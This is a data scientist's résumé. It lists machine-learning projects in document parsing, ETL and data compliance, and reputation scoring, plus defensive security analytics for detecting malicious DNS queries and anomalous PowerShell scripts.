Meticulous Data Scientist accomplished in compiling, transforming and analysing complex information through software. Expert in machine learning and large dataset management. Demonstrated success in identifying relationships and building solutions to business problems. Around six years of AI ML application development experience with major highlights:
The project is to implement document parsing service to extract relevant information from different kinds of documents like CVs, JDs. etc. The project uses combination of vision-based approaches and natural language processing to make sense of document.
Technology Used : Python, spaCy, NLTK, OpenCV, Tessaract, PaddleOCR, Machine Learning, Deep Learning, Natural Language Processing, Large Language models, Langchain, AWS Services, GenAI
Role and Responsibilities:
The goal of this project is to perform ETL tasks which include Data Compression, Data Formatting, and Data Versioning at different stages in the cloud and on premise data stores. It ensures Right To Be Forgotten Policy in accordance with the governmental regulations.
Technology Used: Python, PySpark, AWS Services, PostgreSQL, Snowflake, UC4 Automic, Privacera
Role and Responsibilities:
●Performed ETL tasks using AWS Glue and Batch Jobs.
● Implemented Data Compression, Data formatting, Data Versioning at
different stages in cloud and On-premise data store.
● Implemented Right to be forgotten policy.
● Automated the entire workflow using UC4 Jobs, workflows, and scheduler.
The scope of the project is to analyze the DNS queries to determine if the query is malicious or not, using different Machine Learning classification models.
Technology Used: Python, ML, NLP, AWS Services
Role and Responsibilities:
● Performed Data Collection from Splunk logs.
● Extracted and analysed features from the queries.
● Implemented classification models to classify the queries as normal and malicious.
This project focuses on detecting anomalies in PowerShell scripts by leveraging clustering models.
Technology Used: Python, ML, Clustering, AWS Services
Role and Responsibilities:
● Leveraged clustering models to identify rare PowerShell scripts as potential threats.
● Employed TFIDF for comprehensive feature extraction of scripts.
● Applied K-means clustering to group similar scripts, differentiating anomalies effectively.
● Streamlined monitoring process, decreasing required analysts from 50 to 1 for suspicious script review.
A customer better solution enables financial institutions to assess an organization’s
reputation with integrated multidimensional strategy using consolidated news, reviews,
financial factors for accurate score analysis and reporting for direct competitor analysis
between organizations within the same sector.
Technology Used: Python, NLP, Deep Learning, AWS S3, AWS Sagemaker
Role and Responsibilities:
● Extracted data from Twitter and Reuters news headlines.
● Cleaning and preprocessing of extracted datasets.
● Implemented reputation score calculation for organizations.
● Implemented graphs to show performance of an organisation with their competitor within the same sector.
Global Data Science Challenge - 2023
Python, Faster R-CNN, Cascade R-CNN, AWS (SageMaker, S3)